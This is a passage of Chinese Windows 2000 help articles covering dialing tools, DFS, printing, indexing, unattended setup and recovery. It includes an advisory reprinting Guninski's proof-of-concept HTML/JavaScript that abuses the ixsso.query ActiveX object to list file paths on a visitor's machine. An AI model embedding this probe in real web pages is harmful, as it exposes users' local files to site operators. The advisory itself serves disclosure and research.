    Win2000提供的电话拨号程序较以前版本有了很大的变化，除提供针对本地电话的拨叫功能外，最主要的变化是融入了强大的Internet支持。如果你是一个上网用户，可以通过该工具拨号到世界任何地方，它使用的当然是IP电话了。此外，程序也提供了基于Internet视频会议的支持，现在它已经成为一个功能非常全面的工具了。
    作为一个功能强大的工具，程序的界面保持了微软工具一贯的特点，界面简洁、操作简单，你可以直接在程序界面左边的列表窗口中选择需要的操作项目，然后结合按钮条中的相关按钮，就可快速完成需要的操作。对于拨号呼叫，程序默认Internet呼叫优先，不过你可以在程序的运行环境设置界面中修改该项设置。对于使用基于网络的功能，需要添加相应的服务器信息以及用户信息。
    对于程序的使用方法，非常简单，如果是拨叫本地电话，可单击“拨号”按钮，并在关联界面中输入拨叫的号码，然后选择拨号方式（电话号码、IP地址、计算机名等），最后单击“呼叫”按钮，此时程序会给出如^15020201g^7所示的界面，并开始拨号，如果拨号成功就可以开始通话了。从图中可以看到，在这个面板中提供了视频窗口、音频调节、呼叫状态、拨号盘、将当前号码添加到电话簿等功能按钮，非常全面。
    除电话拨号程序外，Win2000还为我们提供了一个全新的局域网聊天工具Winchat.exe，它替代了Win9x中的Winpopup。这个工具提供类似OICQ提供的二人世界方式的聊天窗口，可以实现即时显示对方的聊天内容，而不须要频繁地发送信息，使用效果非常好，在此建议你试试。其启动方法是：单击系统开始菜单，单击“运行”命令，在关联的界面文本框中输入“Winchat.exe”，启动程序，然后呼叫对方用户即可。
   十、中文转码器
    “中文转码器”是一个非常好用工具，它可以将不同格式的中文编码信息相互转换，通过这个工具我们可以将国标码转换为Big 5码、Unicode，或者是倒过来，而且程序提供了简体中文和繁体中文字符的相互转换功能，是一个非常好用的工具。实际上这项功能我们在Word2000中就接触过，这次只是将它移到了Win2000这个操作系统中。不过这个工具的功能有些单薄，程序并不能很好地转换简体中文和Big 5中文的不同词汇，如“软件”和“软体”等之间的相互转换。
    “中文转码器”的使用方法是非常简单的：首先从系统开始菜单中的“附件”组中启动它，在“来源”标签项中设置需要转换的文件，或者单击“从剪贴板”按钮粘贴来自剪贴板的信息，在“代码页”项中设置当前文本的编码形式。切换到“目标”标签项，在其中设置输出文件的相关信息，该界面中的样式与“来源”标签项完全一致，参考使用即可。此外，在“选项”标签项中提供了有关转换简、繁体字符、半角/全角字符的相关设置，根据转换的内容选择即可。最后单击界面中的“立即转换”按钮以完成转换。如果需要了解转换结果，可单击界面中的“察看”按钮，程序会给出一个独立的窗口，并显示转换结果内容的。


微软Windows 2000索引服务的文件验证漏洞

《一键清理系统垃圾》

微软Windows 2000索引服务的文件验证漏洞

受影响的系统:
Microsoft Indexing Services for Windows 2000
+ Microsoft Windows NT 2000

微软Windows 2000索引服务是一个搜索引擎，它允许用户使用他们的浏览器对在线站点进行全文搜索。搜索结果包括Word、Excel、PowerPoint和HTML文档。默认情况下Windows 2000未打开该服务。

恶意的网站管理员能够在打开了索引服务的Windows 2000系统中验证文件的存在性。网站管理员通过包含Activex对象“ixsso.query”的特殊构造的HTML来使用索引服务，从而能够搜索特定的文件。查询结果将显示文件的完整物理路径，这样的查询结果只能从那些在索引服务中被明确配置成可搜索的目录中获得。

成功地揭示文件的存在性将有助于对目标系统的更严重的攻击。

<* 来源： Georgi Guninski (guninski@guninski.com) *>

测试程序：

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Georgi Guninski <guninski@guninski.com> 已经建立如下演示页面：
http://www.guninski.com/indexserv1.html

该页面的关键代码如下：

Search for files containing: <INPUT NAME="query" TYPE="text">
<INPUT TYPE="BUTTON" VALUE="Search" onclick="g(document.all.query.value)">
<INPUT TYPE="BUTTON" VALUE="Find *.txt files" onclick="g('@filename = *.txt')">

<SCRIPT>
function g(q1)
{

qu=new ActiveXObject("ixsso.query");

qu.Catalog="System";
file://qu.query="@contents name";
file://qu.query="#filename .htm or name near test";
file://qu.query='@filename = *.doc ';
qu.query=q1;

qu.Columns="filename, path, doctitle, doccomments, docauthor, size";

rs=qu.CreateRecordset("nonsequential");
file://alert("Records: "+rs.RecordCount);

doc=window.frames[0].document;
doc.writeln("SEARCH RESULTS Records: "+rs.RecordCount+"
");
doc.writeln("<TABLE BORDER=2>");
doc.writeln("<TR><TD>Path</TD><TD>size</TD><TD>DocAuthor</TD><TD>DocTitle</TD></TR>");
while (!rs.EOF)
{
doc.writeln("<TR><TD><A TARGET='_blank' HREF='file://"+rs("Path")+"'</A>"+rs("Path")+"</TD><TD>"+rs("size")_

+"</TD><TD>"+rs("DocAuthor")+"</TD><TD>"+rs("DocTitle")+"</TD></TR>");
rs.MoveNext();
}
doc.writeln("</TABLE>");

}
//setTimeout("g()",1000);
</SCRIPT>

<IFRAME WIDTH=700 HEIGHT=400 SRC="about:blank"></IFRAME>

  返回


文件和打印系统的配置与管理

《一键清理系统垃圾》

文件和打印系统的配置与管理

本章主要内容：
1. 分布式文件系统
2. 打印系统
3. 索引服务

    8.1 文件系统
    8.1.1 分布式文件系统的基本概念
    系统管理员可以利用分布式文件系统 (DFS)，使用户访问和管理那些物理上跨网络分布的文件更加容易。通过 DFS，可以使分布在多个服务器上的文件在用户面前显示时，就如同位于网络上的一个位置，用户在访问文件时不再需要知道和指定它们的实际物理位置。
§　DFS 类型
    通过 DFS 控制台，用户可以按独立的分布式文件系统或基于域的分布式文件系统来实施分布式文件系统。
§　DFS 体系结构
    除了 Windows 2000 中基于服务器的 DFS 组件外，还有基于客户的 DFS 组件。DFS 客户程序可以将对 DFS 根目录或 DFS 链接的引用缓存一段时间，该时间由管理员指定。运行 DFS 客户程序的计算机必须是 DFS 根目录域的成员。DFS 客户组件可以在许多不同 Windows 平台上运行。

那么在什么时候需要使用DFS呢？
在以下情形下，用户应该考虑实施 DFS：
§　访问共享文件夹的用户分布在一个站点的多个位置或多个站点上。
§　大多数用户都需要访问多个共享文件夹。
§　通过重新分布共享文件夹可以改善服务器的负载平衡状况。
§　用户需要对共享文件夹的不间断访问。
§　用户的组织中有供内部或外部使用的 Web 站点。

8.1.2 分布式文件系统的特性
    分布式文件系统 (DFS) 提供了几个重要特性：
§　容易访问文件
    分布式文件系统使用户可以更容易地访问文件。即使文件可能在物理上跨越多个服务器，用户也只需要转到网络上的某个位置即可访问文件。而且，当更改共享文件夹的物理位置时，不会影响用户访问文件夹。用户不再需要多个驱动器映射来访问文件。 最后，计划文件服务器维护、软件升级和其他任务（一般需要服务器脱机）可以在不中断用户访问的情况下完成。通过选择 Web 站点的根目录作为 DFS 根目录，可以在分布式文件系统中移动资源，而不会断开任何 HTML 链接。
§　可用性
    基于域的 DFS 以两种方法确保用户保持对文件的访问：
1. Windows 2000 自动将 DFS 拓扑发布到 Active Directory。这确保 DFS 拓扑对域中所有服务器上的用户总是可见的。
2. 作为管理员，用户可以复制 DFS 根目录和 DFS 共享文件夹。复制意味着可以在域中的多个服务器上复制 DFS 根目录和 DFS 共享文件夹, 即使这些文件驻留的一个物理服务器不可用，用户将仍然可以访问文件。
§　服务器负载平衡
    DFS 根目录可以支持物理上通过网络分布的多个 DFS 共享文件夹。例如，当用户有一个知道用户将大量访问的文件时。并非所有的用户都在单个服务器上物理地访问此文件，这将会增加服务器的负担，DFS 确保访问文件的用户分布于多个服务器。然而，在用户看来，文件驻留在网络上的相同位置。

8.1.3 创建分布式文件系统的根目录
    分布式文件系统 (DFS) 拓扑由 DFS 根目录、一个或多个 DFS 链接、一个或多个 DFS 共享文件夹，或每个 DFS 所指的副本组成。
DFS 根目录所驻留的域服务器被称为"宿主服务器"。通过在域中的其他服务器上创建"根目录共享"，可以复制 DFS 根目录。确保在宿主服务器不可用时，文件仍可使用。
    对于用户，DFS 拓扑对所需网络资源提供统一和透明的访问。对于系统管理员，DFS 拓扑是单个 DNS 名称空间：使用基于域的 DFS，将 DFS 根目录共享的 DNS 名称解析到 DFS 根目录的宿主服务器。
    因为基于域的分布式文件系统的宿主服务器是域中的成员服务器，在默认情况下，会将 DFS 拓扑自动发布到 Active Directory 中，因而提供了跨越主服务器的 DFS 拓扑同步。这反过来又对 DFS 根目录提供了容错性，并支持 DFS 共享文件夹的可选复制。

下面让用户先为域 nt2000.com 创建一个分布式文件系统的根目录：
    步骤1 打开 DFS 管理器
    步骤2 在"操作"菜单上，单击"新建 DFS 根目录"，然后单击"下一步"
    步骤3 单击要创建的 DFS 根目录的类型（基于域或独立），在此用户选择"创建一个域DFS根目录" 如图 8.1，然后单击"下一步"

步骤4 如果要创建基于域的 DFS 根目录，请选择要创建根目录的域名 nt2000.com ，然后单击"下一步"。
    步骤5 输入 DFS 根目录的宿主计算机名称，或从可用服务器列表中单击名称 "n2k_server.nt2000.com" 如图 8.2。然后单击"下一步"。

步骤6 单击指定要创建的新共享文件夹的路径和名称 如图 8.3，然后单击"下一步"。
    步骤7 接受 DFS 根目录的默认名称，或指定新名称，然后单击"下一步"。

步骤8 单击"完成"，为 nt2000.com 创建了一个新 DFS 根目录如图8.4。

8.1.4 配置分布式文件系统
§　添加 DFS 根目录共享
    步骤1 打开 DFS
    步骤2 在"操作"菜单上，单击"新建根目录共享"。
    步骤3 输入根目录共享的宿主计算机的名称，或单击可用服务器列表中的名称，然后单击"下一步"。
    步骤4 单击现有共享文件夹或指定要创建的新共享文件夹的路径和名称，然后单击"下一步"。
    步骤5 接受根目录共享的默认名称，或指定新名称，然后单击"下一步"。
    步骤6 单击"完成"，创建新的根目录共享。

§　添加 DFS 链接
    步骤1 打开DFS
    步骤2 在控制台目录树中，右键单击 DFS 根目录。
    步骤3 单击"新建 DFS 链接"。
    步骤4 键入新 DFS 链接的名称和路径，或单击"浏览"，从可用共享文件夹的列表中选择。 如图 8.5
    步骤5 （可选）输入注释以进一步标识或描述 DFS 链接。
    步骤6 键入期限（在此期限内到 DFS 链接的引用将被缓存在 DFS 客户机上），然后单击"确定"。

§　设置复制策略
    步骤1 打开 DFS
    步骤2 右键单击 DFS 根目录或 DFS 链接，然后单击"复制策略"。
    步骤3 在共享文件夹列表中，单击要用作复制主文件夹的 DFS 共享文件夹。
    步骤4 单击列表中的每个共享文件夹，并单击"启用"或"禁用"，然后单击"确定"。
    注意：一旦设置了复制主文件夹，当以后显示该窗口时，"初始主文件夹"按扭将不再出现。这是因为只会设置一次主文件夹来初始化复制；从那时起，无论何时某个 DFS 共享文件夹中的数据发生更改，DFS 共享文件夹都会相互复制。

    8.2 打印系统
    使用 Windows 2000，用户可以在整个网络上共享打印机资源。不同计算机和操作系统的客户，可以通过 Internet 将打印作业发送到直接连接 Windows 2000 打印服务器的打印机，或者使用内部或外部网卡连接到网络或其他服务器的打印机。
§　打印设置
    对于管理员，Windows 2000 提供了改进的通用网络配置工具。例如，新的标准端口（在本主题的稍后描述）简化了网络上大多数 TCP/IP 打印机的安装。此外，改进的打印机属性页用户界面，使得最终用户和管理员配置和支持其打印需要更为容易。
§　打印管理
    Windows 2000 通过添加远程端口管理提供改进的远程管理。用户可以从 Windows 2000 计算机上完全远程管理和配置（包括远程端口管理）打印机，而无需到打印服务器计算机上操作。
§　Internet 打印
    Windows 2000 打印体系结构现在已经与 Internet 集成在一起。对于最终用户，Windows 2000 提供跨 Internet 的打印。
  §　可以使用统一资源定位符 (URL)，从 Windows 2000 Server 和 Windows 2000 Professional 客户打印到 Windows 2000 打印服务器。
  §　可以使用浏览器管理打印机。可以暂停、继续、删除打印作业，查看打印机和打印作业的状态。

  §　可以使用 Web 即点即打功能（只需单击鼠标即可安装共享打印机）连接到网上的打印机。也可以从 Web 站点安装驱动程序。
§　目录服务
    默认情况下，Windows 2000 Server 将域中的所有共享打印机作为 Active Directory 中的对象。当列表（或"发布"）目录中的共享打印机时，可以使用搜索工具快速定位最方便的打印资源。例如，可根据特征（如彩色打印）或位置（如一座楼的指定楼层）搜索。
§　标准端口监视器
    新的标准端口监视器将 Windows 2000 打印服务器连接到使用了 TCP/IP 协议的网络接口打印机。它取代了用于直接或通过网卡连接到网络的 TCP/IP 打印机的 LPRMON。新的标准端口比 LPRMON 快 50%。连接到 UNIX 或 VAX 主机的打印机仍要求有 LPRMON。
§　打印队列监视
    现在可以使用"系统监视器"的新对象 Print Queue 来监视本地或远程打印机的性能。可以为诸如每秒打印的字节数、作业错误以及打印的总页数等性能标准设置计数器。
§　用户设置
    Windows 2000 Server 和 Windows 2000 Professional 客户现在也具有更改个人文档默认设置的能力。以前，在管理员初始设置了用户的文档之后，只有 Windows 95 和 Windows 98 用户可以修改其文档设置。
§　从应用程序打印
    在从应用程序打印时，屏幕上出现的标准打印对话框是已经得到增强和改进的对话框。现在不但可以在 Active Directory 中搜索打印机，甚至还可以添加打印机。

8.2.1 打印过程
    下面让用户先来了解一下，Windows 客户机是如何通过一台Windows 2000 Server 打印服务器，完成一个文档的打印处理过程的。如图 8.6
    1. Windows 2000 客户计算机上的用户选择打印文档。
    2. 如果此文档是从 Windows 应用程序提交的，则该应用程序将调用图形设备接口 (GDI)，而该接口将调用与目标打印机相关联的打印机驱动程序。GDI 和驱动程序通过使用该应用程序中的文档信息来互相交换数据，以便用该打印机的语言来提交打印作业，并将它传送到客户端后台打印程序。如果客户机使用的是非 Windows 操作系统，或非 Windows 应用程序，则其他组件将替代 GDI 执行相似任务。
    3. 客户计算机向打印服务器递交打印作业。对于 Windows NT 4.0 或 Windows 2000 客户，客户端后台打印程序都会向服务器端后台打印程序发出远程过程调用 (RPC)，该服务器端后台打印程序使用路由器轮询客户端的远程打印提供程序。然后远程打印提供程序向服务器后台打印程序发出另一个 RPC，服务器后台打印程序通过网络接收打印作业。

4. 在打印服务器上，来自 Windows NT 或 Windows 2000 客户的打印作业都是增强型图元文件 (EMF) 数据类型。多数非 Windows 应用程序都使用 RAW（打印就绪）数据类型。
    5. 服务器上的路由器将打印作业传送给服务器上的本地打印提供程序（后台打印程序的组件），后者将后台打印该作业（将其写入磁盘）。
    6. 本地打印提供程序将轮询打印处理器。打印处理器识别该作业的数据类型并接收打印作业。然后打印处理器根据其数据类型转换打印作业。
    7. 如果在客户计算机上定义了目标打印机，打印服务器服务将决定服务器的后台打印程序是转换该打印作业，还是分配另一种数据类型。然后将打印作业传送给本地打印提供程序，后者将其写入磁盘。
    8. 对打印作业的控制被传递给分隔页处理器，分隔页处理器将根据指定，在作业的前面添加分隔页。
    9. 作业交给给打印监视器。对于双向打印机，语言监视器将处理发送方和打印机之间的双向通讯，然后将打印作业传送到端口监视器。如果打印机不是双向打印机，打印作业将被直接传送到端口监视器，后者将它发送到目标打印机（或其他网络打印服务器）。
    10. 该打印机接收打印作业，然后将每一页转换成位图格式，再打印出来。

8.2.2 Internet 打印
    Internet 打印（Windows 2000 中的一个新功能）提供了通过 Internet 将打印作业提交给一台打印机的方法。例如，只要用户有出版商打印机的名称以及适当的权限，就可以将公司新的编目直接发送到出版商的打印机。如图 8.7
§　要从 Internet 或 Intranet 安装打印机，可使用打印机的 URL 作为打印机的名称。管理员也可以在 Intranet 内使用 URL 格式。
§　对于 Windows 2000 Server 而言，要处理包含 URL 的打印作业，必须运行"Microsoft Internet 信息服务"(IIS)。对于在 Windows 2000 Professional 上实施的打印服务器，必须运行"Microsoft 对等 Web 服务"(PWS)。

§　Internet 打印使用"Internet 打印协议"(IPP) 作为低层协议，该协议封装在被用作传输器的 HTTP 内。当通过浏览器访问打印机时，系统首先试图使用 RPC（在 Intranet 和 LAN 上）进行连接，因为 RPC 快速而且有效。
§　打印服务器的安全性由 IIS 或 PSW 提供，这取决于用户正在运行是 Windows 2000 Server 还是 Windows 2000 Professional。要支持所有的浏览器以及所有的 Internet 客户，管理员必须选择基本身份验证。作为可选项，管理员也可以使用 Microsoft 质询/响应或 Kerberos 身份验证，这两者都被 Microsoft Internet Explorer 所支持。
§　可以管理来自任何浏览器的打印机，但是必须使用 Internet Explorer 4.0 或更高版本才能使用浏览器连接打印机。

8.2.3 配置网络打印机
    在购买和安装打印机之前，作为 Windows 2000 Server 环境的管理员，首先应检查打印工作量和估计需要的容量,以满足各种条件下的需求。还需建立可简化打印环境的安装、使用和支持的命名约定。其次，还需确定网络所需的打印服务器的数量，以及分配给每台服务器的打印机的台数。最后，必需确定要购买的打印机、作为打印服务器的计算机、放置打印机的位置以及如何管理打印机的通信。

8.2.3.1 添加打印机
    安装本地打印机
§　安装并行端口（LPT 口）打印机
    步骤1 根据打印机说明书文档，将打印机连接到计算机上适当的端口，并验证打印就绪。
    步骤2 打开打印机。双击"添加打印机"，启动添加打印机向导，然后单击"下一步"
    步骤3 单击"本地打印机"，确保选中"自动检测并安装我的即插即用打印机"复选框，然后单击"下一步"，如图 8.8

步骤 4 根据正在安装的打印机，显示"查找新硬件"消息或"查找新硬件"向导，通知用户已经检测到打印机并且开始安装如图8.9

    步骤5 选择查找到的设备驱动如图8.10
    步骤6 执行安装
或者，在连接打印机后，启动或重新启动计算机以允许 Windows 2000 自动检测并启动"查找新硬件"向导。
§　安装通用串行总线 (USB) 或 IEEE 1394 打印机
    1.Windows 2000 会自动检测并启动"查找新硬件"向导。不需要关闭或重新启动计算机，只需按照屏幕上的说明即可完成安装。
    2.将打印机图标添加到"打印机"文件夹。
    注意：要添加和设置直接连接到计算机上的打印机，必须以 Administrators 组成员的身份登录。在 Windows 2000 Server 中，默认情况下，添加打印机向导会共享该打印机并在 Active Directory 中发布，除非在向导的"打印机共享"屏幕中选择了"不共

享此打印机"。在 Windows 2000 Professional 中，添加打印机向导不自动共享打印机；需要选择"共享为"来共享并发布该打印机。

添加直接连到网络的打印机
    步骤1 打开打印机
    步骤2 双击"添加打印机"，启动添加打印机向导，然后单击"下一步"。
    步骤3 单击"本地打印机"，清除"自动检测并安装我的即插即用打印机"复选框，然后单击"下一步"。
    步骤4 按照屏幕上的说明，选择打印机端口、选择打印机的制造商和型号、键入打印机的名称，完成打印机设置。
    步骤5 当添加打印机向导提示用户选择打印机端口时，单击"创建新端口"。
    步骤6 从列表中单击合适的端口类型并按照说明进行。（默认情况下，只有"Local Port"和"Standard TCP/IP Port"显示在列表中。）
    注意：因为打印机直接连接到网络上，而不是连接到 Windows 2000 计算机上，所以必须清除"自动检测打印机"复选框。下列组策略设置可以更改 Windows 2000 Server 添加打印机向导的默认操作：
  §　默认情况下启用"允许发布打印机"；可以禁用该选项，阻止发布打印机。
  §　默认情况下启用"在 Active Directory 中自动发布新打印机"；可以禁用该选项以防止添加打印机向导在添加新打印机时自动发布打印机。
  §　默认情况下启用"在添加打印机向导中显示下级页面"；可以禁用此选项以防止添加打印机向导浏览共享打印机的网络。

8.2.3.2 配置打印服务器
§　设置打印机属性
    步骤1 打开打印机
    步骤2 右键单击要更改设置的打印机，然后单击"属性"，
如图 8.11
    步骤3 单击每个可用选项卡，按需要更改选项，例如共享打印机、添加和配置端口、计划打印机的可用性、分配权限、指定指派给送纸器的格式。

§　设置打印首选项
    步骤1 打开打印机
    步骤2 右键单击要更改设置的打印机，然后单击"打印首选项"，如图8.12
    步骤3 单击每个可用选项卡，按需要更改选项，例如设置页面方向 、指定页面大小 、设置打印分辨率 、单面或双面打印 、每页纸打印多页内容 、设置打印份数
§　为打印机设置安装选项
    步骤1 打开打印机
    步骤2右键单击要为之设置选项的打印机，然后单击"属性"。
    步骤3 在"设备设置"选项卡的"可安装选项"下，单击要设置的所有选项。如设置打印机的可安装选项 、设置打印机的内存 、匹配打印机纸盒与纸张规格 、确保正确打印复杂页面 、安装和删除外部 PCL 软字体 、使用字体盒字体

8.2.3.3 查找打印机
    步骤1 打开查找打印机 如图 8.13
    步骤3 在"范围"框中，选择要搜索的域，或者单击"浏览"定位域。如果选择"整个目录"，也可以使用"高级"选项卡来缩小搜索范围。
    步骤3 在"打印机"、"功能"和"高级"选项卡上，输入要用的搜索参数。在"打印机"选项卡上，输入名称、位置和打印机型号。
  §　如果某个位置出现在"位置"中，网络管理员设置网络以便 Windows 将试图显示默认的离用户最近的打印机。也可以单击"浏览"按钮，搜索另一位置的打印机。如果"位置"是空的，Windows 将在整个目录中搜索打印机，但是如果用户知道位置的

名称，仍可输入位置。
  §　在"功能"选项卡上，可以选择附加的搜索选项，例如打印机是否可以双面打印或者以特定分辨率打印。
  §　在"高级"选项卡上，可以使用自定义或附加字段指定标准（例如打印机是否支持排序或特定打印机语言）以进行搜索。
    步骤4 单击"开始查找"运行搜索，或者单击"全部清除"，清除标准字段并开始新的搜索。

8.2.4 管理网络打印机
    步骤1 打开打印机
    步骤2 在"文件"菜单上，单击"服务器属性"，如图 8.14
    步骤3 根据需要，执行如下各种管理操作
  §　为其他客户添加打印机驱动程序
  §　更新打印机驱动程序
  §　删除打印机驱动程序
  §　列出打印机驱动程序的所有文件
  §　更改后台打印文件夹的位置
  §　启用或禁用记录打印事件
  §　启用或禁用在完成打印后通知用户
  §　创建自定义打印机格式
  §　设置端口和协议

8.3 索引服务
    索引服务从一组文档中提取信息，并组织该信息，以便能够通过 Windows 2000 的"搜索"功能、索引服务查询表或 Web 浏览器快速容易地进行访问。该信息可以包含文档中的文字（内容）和文档的特征及参数（属性），例如作者姓名。一旦创建了索引，就可以查询包含关键字词或者属性的文档的索引。例如，可以查询所有包含单词"product"的文档，也可以查询特定作者写的所有 Microsoft Office 文档。索引服务返回符合搜索条件的所有文档的列表。通过一个称为"索引"的进程，索引服务使用文档筛选器来读取文档并提取文本和属性以传递给索引器。
    索引服务索引下列类型的文档：
§　HTML
§　文本
§　Microsoft Office 95 和更高版本
§　Internet 邮件和新闻（须安装"Internet 信息服务"）
§　可以使用文档过滤器的其他任何文档
    在使用索引服务之前，首先需要建立查询。使用查询，就可以通过在文档内容中搜索词或词组，或者查询其属性（例如文档名或作者）来搜索文档。最简单类型的查询是单个词的查询。例如，如果用户要查找"operation"，"索引服务"将返回所有其内容包含单词"operation"的文档。也可以查找其属性值与给定条件相匹配的文档。可以查询的属性包括基本文档信息，例如文档名称和文档大小。也可以查询 ActiveX 属性，例如文档摘要。ActiveX 属性存储在由支持 ActiveX 的程序创建的文档中，例如 Microsoft Office 应用程序。

  有五种查询：
§　自由文本查询
§　词组查询
§　模式匹配查询
§　相关查询
§　向量空间查询
    在计算机管理器中的索引服务有"System"和"WEB"两个编目，用户还可以根据自己的需要创建其它的编目。在编目下有"目录"、"属性"和"查询编录"。 "目录"用于保存进行索引的磁盘文件夹如图 8.15，用户可以增加或删除需要索引的文件夹同时还可以实现手工索引。

"属性"保存对应的建立索引的查询方式 如图 8.16，可以设置是否对未知的文件扩展名进行索引、是否建立查询文件摘要。

"查询编录"适用于用户进行条件查询 如图 8.17。

返回


无人值守安装win2000的方法

《一键清理系统垃圾》

无人值守安装win2000的方法

    目前流行的Win2000安装方法无非是两种：硬盘安装和光盘安装，下面就分别介绍这两种安装方法的引导软盘制作方法。

    1.从硬盘安装：

    (1)在纯DOS下用format A:/s 处理一张软盘；

    (2)在该盘里建立文件Config.sys，并编辑命令行：

    device=C:\windows\himem.sys 用以加载windows的系统信息文件himem.sys，好让DOS系统能运行smartdrv.exe

    (3)在该盘里建立文件Autoexec.bat，并编辑命令行：

    C:\>windows\smartdrv.exe

    X:\>i386\winnt/u:\i386\unattend.txt /s:X:\i386 /t:Z:

    (X盘代表Win2000的安装文件夹i386所在的逻辑盘，Z则代表Win2000系统被安装在的逻辑盘。问题：在编辑Autoexec.bat时为什么一定要在/u后面加：\i386\，而手工操作时就不用呢？)

    用此盘引导，在软驱灯熄灭后就把软盘取出。

    2.从光盘安装：

    此法在Win2000的无人守值安装说明里也提到过，把应答文件改名换姓为winnt.sif并拷进一张空白的软盘里，安装时把软盘和光盘一同放进机器里，把主板CMOS的设置临时改为由光盘引导……我经过摸索，设计了软盘引导法：

    1)在纯DOS下用format A:/s 处理一张软盘

    2)把应答文件unattend.txt拷进软盘里(其实把此文件放在天崖海角也无所谓，只要设置好路径，让安装程序能找到它就行了)

    3)在软盘里创建文件Config.sys，并编辑命令行：

    device=C:\windows\command\ebd\oakcdrom.sys/d:mscdxxx

    device=C:\windows\himem.sys

    4)在盘里创建文件Autoexec.bat，并编辑命令行：

    C:\windows\command\mscdex.exe/d:mscdxxx

    C:\>windows\smartdrv.exe

    X:\>i386\winnt/u:A:\unattend.txt /s:X:\i386 /t:Z:

    (Config.sys里的命令行device=C:\windows\command\ebd\oakcdrom.sys/d:mscdxxx和Autoexec.bat里的命令行C:\windows\command\mscdex.exe /d:mscdxxx都是为了在纯DOS下加载光驱。值得一提的是，在我的这个Win98 SE 的正式版4.10.2222A里竟然没有子文件夹ebd，文件oakcdrom.sys只能到启动软盘里去拷贝，Config.sys里的命令行就改为device=oakcdrom.sys/d:mscdxxx，注意：Config.sys和Autoexec.bat中的mscdxxx中的xxx可以为任意字符，但是二者必须相同)

    用此盘引导，软驱灯会有第二次发光，是系统在寻找并读取软盘里的应答文件attend.txt，软驱灯熄灭后把软盘取出。

返回


系统的诊断与修复

《一键清理系统垃圾》

系统的诊断与修复

本章内容包括：
1. 系统环境的保护概述
2. 事件查看器
3. 事故恢复
4. 故障恢复控制台
5. 紧急修复磁盘
6. 性能监视器
7. 任务管理器
8. 计划任务

    15.1 系统环境的保护概述
    保护系统的安全稳定的运行，当系统发生故障时能够及时的发现故障并排除，是系统管理员的一项重要职责。在 Windows 2000 Server 中提供了一系列的工具以保证管理员便捷的完成管理维护工作。

首先，管理员利用 Active Directory 、组策略及 Kerberos 验证等工具，建立一整套完善的安全策略，保证系统的安全可靠性，将人为造成破坏的可能降到最低。
    其次，利用系统备份、配置容错能力（如磁盘镜像、RAID）、病毒检查、磁盘碎片整理等工具保证将由硬件问题引起的系统故障降低到最低。
    第三，在实施以上步骤后，管理员还要利用事件查看器、网络监视器、系统信息实时监视系统，从而实现及时发现问题解决问题，保证系统的安全稳定。
    管理员可以通过设定系统异常的反应措施、制作紧急修复盘、安全模式启动、故障恢复控制台、自动系统恢复等措施，保证当系统发生问题的时候及时的排除问题。
    管理员还可以通过任务管理器和性能监视器监测系统的运行性能，发现系统的瓶颈，提高系统的性能。

    15.2 事件查看器
    通过使用事件查看器 如图 15.1和事件日志，用户可以收集有关硬件、软件、系统问题的信息并监视 Windows 2000 安全事件。

15.2.1 Windows 2000 以三种日志方式记录事件：
    应用程序日志
    应用程序日志包含程序所记录的事件。例如，数据库程序可记录程序日志中的文件错误。程序开发人员决定监视哪个事件。
    安全日志
    安全日志包括有效和无效的登录尝试以及与资源使用相关的事件，如创建、打开或删除文件或其他对象。例如，如果用户已经启用登录和注销审核，则登录到系统的尝试将记录在安全日志中。
    系统日志
    系统日志包含 Windows 2000 的系统组件记录的事件。例如，在启动过程将加载的驱动程序或其他系统组件的失败记录在系统日志中。Windows 2000 预先确定由系统组件记录的事件类型。
注意：
§　启动 Windows 2000 时事件日志服务会自动启动。
§　所有用户都可查看应用程序和系统日志。只有系统管理员才能访问安全日志。
§　在默认情况下，安全日志是关闭的。要启用安全日志，请使用组策略来设置审核策略。管理员也可在注册表中设置审核策略，以便当安全日志满出时使系统停止响应。

15.2.2 事件查看器显示这些事件的五种类型：
    错误
    重要的问题，如数据丢失或功能丧失。例如，如果在启动过程中某个服务加载失败，这个错误将会被记录下来。
    警告
    并不是非常重要，但有可能说明将来的潜在问题的事件。例如，当磁盘空间不足时，将会记录警告。
    信息
    描述了应用程序、驱动程序或服务的成功操作的事件。例如，当网络驱动程序加载成功时，将会记录一个信息事件。
    成功审核
    成功的审核安全访问尝试。例如，用户试图登录系统成功会被作为成功审核事件记录下来。
    失败审核
    失败的审核安全登录尝试。例如，如果用户试图访问网络驱动器并失败了，则该尝试将会作为失败审核事件记录下来。
    启动 Windows 2000 时，EventLog 服务会自动启动。所有用户都可以查看应用程序和系统日志。只有管理员才能访问安全日志。
    在默认情况下，安全日志是关闭的。可以使用组策略来启用安全日志。管理员也可在注册表中设置审核策略，以便当安全日志满出时使系统停止响应。

15.3 事故恢复
    计算机故障就是任何导致计算机无法启动或继续运行的事件。计算机出现故障的原因小到一个硬件损坏，大到整个系统丢失（例如在发生火灾或类似事件）。Windows 2000 在遇到此类事件时，会报告一个"停止"错误消息，并显示一些必要的信息，用户和 Microsoft 产品支持服务工程师可利用这些信息确定并识别问题所在。
    故障恢复就是在发生故障后恢复计算机，使用户能够登录并访问系统资源。Windows 2000 提供以下选项可帮助用户识别计算机故障并进行恢复：
    安全模式
    用户可以使用安全模式启动选项来启动系统，在该模式下只启动最少的必要的服务。安全模式选项包括最后一次的正确配置，如果新安装的设备驱动程序在启动系统时出现问题，该选项尤其有用。
    故障恢复控制台
    如果安全模式不起作用，用户可以考虑使用故障恢复控制台选项。建议只有高级用户和管理员才使用该选项。使用安装光盘或从光盘创建的软盘来启动系统。然后，就可以访问"故障恢复控制台"，这是一个命令行界面，可从该处执行诸如启动或停止服务、访问本地驱动器（包括格式化成 NTFS 文件系统的驱动器）等任务。详细信息，请参阅故障恢复控制台。
    紧急修复盘
    如果安全模式和故障恢复控制台不起作用，而且事先已做了适当的高级准备，则可以试着用紧急修复磁盘来修复系统。紧急修复磁盘可以帮助修复内核系统文件。

    15.3.1 安全模式
    安全模式允许用最少的设备驱动程序和服务设置启动系统。安全模式选项包括"最后一次的正确配置"，如果新安装的设备驱动程序在启动系统时出现问题，该选项尤其有用。以安全模式启动 Windows 2000：
    步骤1 单击"开始"，然后单击"关闭系统"。
    步骤2 单击"重新启动"，然后单击"确定"。
    步骤3 在看到消息"请选择要启动的操作系统"后，请按 F8。
    步骤4 使用箭头键高亮显示适当的安全模式选项，然后按 ENTER。
    必须关闭 NUM LOCK，数字键盘上的箭头键才能工作。
    步骤5 使用箭头键高亮显示操作系统，然后按 ENTER。
注意：
